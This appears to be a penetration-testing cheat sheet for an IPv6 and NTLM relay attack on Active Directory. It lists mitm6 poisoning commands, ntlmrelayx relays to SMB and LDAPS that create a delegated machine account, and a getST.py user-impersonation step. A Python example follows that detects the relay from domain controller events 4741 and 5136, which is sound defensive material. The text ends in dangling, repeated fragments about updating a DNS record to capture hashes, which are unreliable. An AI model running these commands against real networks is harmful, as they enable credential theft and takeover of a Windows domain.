```bash
# give yourself any ipv6 address
ip -6 addr add fe80::13:37/10 dev <iface>

# poison single host
mitm6 -hw <host> -d <domain> --ignore-nofqdn

# poison whole network
mitm6 -d <net>

# relay to smb in order to open a socks connection
ntlmrelayx.py -6 -wh <net> -t smb://<ip> -l ~/tmp/ -socks -debug

# relay to ldap in order to create a new machine account, which gives us local system on the poisoned box
ntlmrelayx.py -t ldaps://<dc>.<domain> -wh attacker-wpad --delegate-access

# impersonate user on overtaken machine account
getST.py -spn cifs/<originalcomputeracc>.<domain>/<newcomputeracc> -impersonate <user>
```
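On the detection side, the `--delegate-access` relay in the commands above leaves a recognisable pair of records in the domain controller's Security log: a machine account creates another computer account (event 4741) and then writes `msDS-AllowedToActOnBehalfOfOtherIdentity` on its own object (event 5136). The correlation below is an added example, not part of the original cheat sheet. It assumes directory-service change auditing is enabled; the event dictionaries are constructed and simplified, and the 10-minute window is an arbitrary choice.

```python
from datetime import datetime, timedelta

RBCD_ATTR = "msds-allowedtoactonbehalfofotheridentity"  # compared lower-case
WINDOW = timedelta(minutes=10)  # assumption: tune to your environment

# Constructed, simplified DC Security-log records (not from a real host).
EVENTS = [
    {"time": "2024-05-01T10:00:05", "id": 4741, "SubjectUserName": "WS01$",
     "TargetUserName": "DESKTOP-X1$"},
    {"time": "2024-05-01T10:00:07", "id": 5136, "SubjectUserName": "WS01$",
     "ObjectDN": "CN=WS01,CN=Computers,DC=corp,DC=example",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity"},
    {"time": "2024-05-01T11:30:00", "id": 4741, "SubjectUserName": "helpdesk",
     "TargetUserName": "WS02$"},
    {"time": "2024-05-01T12:00:00", "id": 5136, "SubjectUserName": "admin",
     "ObjectDN": "CN=SRV01,CN=Computers,DC=corp,DC=example",
     "AttributeLDAPDisplayName": "description"},
]

def own_object(subject, dn):
    """True when the DN's leading CN is the subject machine account itself."""
    first_rdn = dn.split(",", 1)[0]
    return first_rdn.lower() == "cn=" + subject.rstrip("$").lower()

def find_rbcd_relay(events, window=WINDOW):
    """Correlate 4741 (computer created by a machine account) with a later
    5136 where that same machine account writes the RBCD attribute on itself."""
    alerts, created = [], {}
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        subj = ev["SubjectUserName"]
        if ev["id"] == 4741 and subj.endswith("$"):
            created[subj.lower()] = (ts, ev["TargetUserName"])
        elif (ev["id"] == 5136
              and ev.get("AttributeLDAPDisplayName", "").lower() == RBCD_ATTR
              and own_object(subj, ev["ObjectDN"])):
            hit = created.get(subj.lower())
            if hit and ts - hit[0] <= window:
                alerts.append({"victim": subj, "new_account": hit[1],
                               "object": ev["ObjectDN"]})
    return alerts

if __name__ == "__main__":
    for alert in find_rbcd_relay(EVENTS):
        print(alert)
```

A hit names both the relayed host and the newly created computer account, which are the two objects to review and clean up.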
Update DNS record
Update DNS record to intercept traffic, capture hashes: